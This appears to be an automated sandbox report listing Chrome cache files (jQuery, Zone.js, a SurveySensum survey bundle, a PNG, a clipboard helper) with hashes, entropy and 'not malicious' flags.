SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 93

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 503 x 237, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	29669
Entropy (8bit):	7.975558957773608
Encrypted:	false
SSDEEP:
MD5:	BC9C43942C9054B58437849A22560EFA
SHA1:	22495D2FEB0F53DAB2EA05E26BD340F06034F197
SHA-256:	38ADDD39FB212BECD53CC572BF3F3ED66A11A1C3D33F1250BC0C72419C3DBDA5
SHA-512:	6FC4716BFE5FF74225B2BD17BDC85C449B463B3FBB6C1740A759C78BCF933791132105568D64B3CA01EE2125FB9E8D3D533F0A50EDB8FCAABFB5900B944A000A
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............O<n....sRGB....... .IDATx^.}.\|.U..!.4Z(I.%....B..F.E.(U...t.^.HS..A.......BI....jB .!=y....-......f9.......f..3w.s.).)....Kl..#..0...#.0..arw.w....0...#......y"0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...F..`...y.0...#..0........P~.F..`...F....#..0...#.`.0.;....a...

Chrome Cache Entry: 94

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33877), with no line terminators
Category:	dropped
Size (bytes):	33877
Entropy (8bit):	5.399526066016777
Encrypted:	false
SSDEEP:
MD5:	145FCE5019CF65EE72686311A410CF74
SHA1:	74D70C60B73E9B6BAD0147A49A1B997F390A9D01
SHA-256:	69488C81202F9893AFEB6185B90EC255A29D5FD43368CCA35A3340B0C2FB3423
SHA-512:	3E0E04C107E58EDA906AA0DE4A0606066B995D5C01A39D8F15E23E5E081E16E8D4053CC3EBFA23959D6FF64374AA51E23E44C295205A3626BE06CACB1814D64E
Malicious:	false
Reputation:	unknown
Preview:	"use strict";(self.webpackChunksurvey_runner=self.webpackChunksurvey_runner\|\|[]).push([[429],{7435:(ie,Ee,de)=>{de(8583)},8583:()=>{!function(e){const n=e.performance;function i(M){n&&n.mark&&n.mark(M)}function o(M,E){n&&n.measure&&n.measure(M,E)}i("Zone");const c=e.__Zone_symbol_prefix\|\|"__zone_symbol__";function a(M){return c+M}const y=!0===e[a("forceDuplicateZoneCheck")];if(e.Zone){if(y\|\|"function"!=typeof e.Zone.__symbol__)throw new Error("Zone already loaded.");return e.Zone}let d=(()=>{class M{constructor(t,r){this._parent=t,this._name=r?r.name\|\|"unnamed":"<root>",this._properties=r&&r.properties\|\|{},this._zoneDelegate=new v(this,this._parent&&this._parent._zoneDelegate,r)}static assertZonePatched(){if(e.Promise!==oe.ZoneAwarePromise)throw new Error("Zone.js has detected that ZoneAwarePromise `(window\|global).Promise` has been overwritten.\nMost likely cause is that a Promise polyfill has been loaded after Zone.js (Polyfilling Promise api is not necessary when zone.js is loaded.

Chrome Cache Entry: 95

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1221600
Entropy (8bit):	5.625483172838377
Encrypted:	false
SSDEEP:
MD5:	C0A4ADFFAD2F94D304B3497B045518EF
SHA1:	DFF0186FAFE4409A6B407F11E6C8331E7BD58074
SHA-256:	3F3C6A6058FB997D781B2B394B0CE33655C64311D42EAB8CEEF8C5560B288DB8
SHA-512:	34E6DB9093156C3BA7B4F6DD87B9B8D56B604043400A0CC97DFF99711D7125817CD47294F225F9E68BF4D48EAE49702E93E796350F00BC8FDB5C9B01EC2D64D2
Malicious:	false
Reputation:	unknown
URL:	https://cx.surveysensum.com/main.fe8e4f85a729233f.js
Preview:	(self.webpackChunksurvey_runner=self.webpackChunksurvey_runner\|\|[]).push([[179],{4407:(ae,W,C)=>{"use strict";C.d(W,{a:()=>y});class y{static HasSpecialCharInResponse(k){let z=!1;for(const P of Object.keys(k.answers))if(k.answers.hasOwnProperty(P)&&P.startsWith("vz")){const v=/[`!#$%^&*()_+=\[\]{};'"\\\|,<>?~]/;if(z=k.answers[P].response.some(x=>v.test(x)),z)break}return z}}},8870:(ae,W,C)=>{"use strict";C.d(W,{Ef:()=>y,H2:()=>x,Zv:()=>v,ad:()=>e,o_:()=>D,ut:()=>k,w_:()=>z});const y="responseLanguage",e="language",k=["jpg","jpeg","png","gif","webp"],z=["images","documents","videos"],D="Thank you for participating but this survey has been closed by the owner",v="Something Went Wrong",x=[{clientName:"Anaptyss",title:"Anaptyss-Feedback Survey"}]},8390:(ae,W,C)=>{"use strict";C.d(W,{$2:()=>$,EQ:()=>x,Eh:()=>re,Uu:()=>Y,Vn:()=>V,Xb:()=>v,co:()=>Q,u1:()=>E,wF:()=>k}),C(1405),C(3098);class k{constructor(){this.response=[],this.questionId="",this.isInLoop=!1,this.isDisplayed=!0,this.isOrphan=!1

Chrome Cache Entry: 96

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45034)
Category:	dropped
Size (bytes):	45035
Entropy (8bit):	5.400557193761079
Encrypted:	false
SSDEEP:
MD5:	C4D5335B2B69C6998EE34F5F7B3E246F
SHA1:	AF0AE01ECCEE153877976D5C7D6500AA9C380B60
SHA-256:	7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
SHA-512:	1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
Malicious:	false
Reputation:	unknown
Preview:	"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 99

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (653), with no line terminators
Category:	downloaded
Size (bytes):	653
Entropy (8bit):	5.362704703934879
Encrypted:	false
SSDEEP:
MD5:	B68EC7A4F7C53B6291F226ABEFAC3FAC
SHA1:	9060E215EE63ED6DA198FA0612801FB8BA612A7B
SHA-256:	2704B6595D1E6716EAACB0AB91139DC50EB97F92B6F9F618F126A13A0CBE4099
SHA-512:	7D37E9DB35A54B6459808EF30E1E49CE47CFDE350C1F1DF97936F205D36F2724C072EBDA90A63697FD98D52786F67ACB02379E604F40CCD45D174A5599340783
Malicious:	false
Reputation:	unknown
URL:	https://cx.surveysensum.com/scripts.3388221dc8831b4e.js
Preview:	async function copyElementTextToClipboard(n,o,l=3e3){try{const t=document.getElementById(n),e=document.getElementById(o);await navigator.clipboard.writeText(t.innerText);const i=e.innerHTML;e.innerHTML='<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="none" d="M0 0h24v24H0V0z"/><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zM9.29 16.29L5.7 12.7c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0L10 14.17l6.88-6.88c.39-.39 1.02-.39 1.41 0 .39.39.39 1.02 0 1.41l-7.59 7.59c-.38.39-1.02.39-1.41 0z" fill="#00875A"/></svg>',setTimeout(()=>{e.innerHTML=i},l)}catch(t){console.log(t)}}

Static File Info

⊘No static file info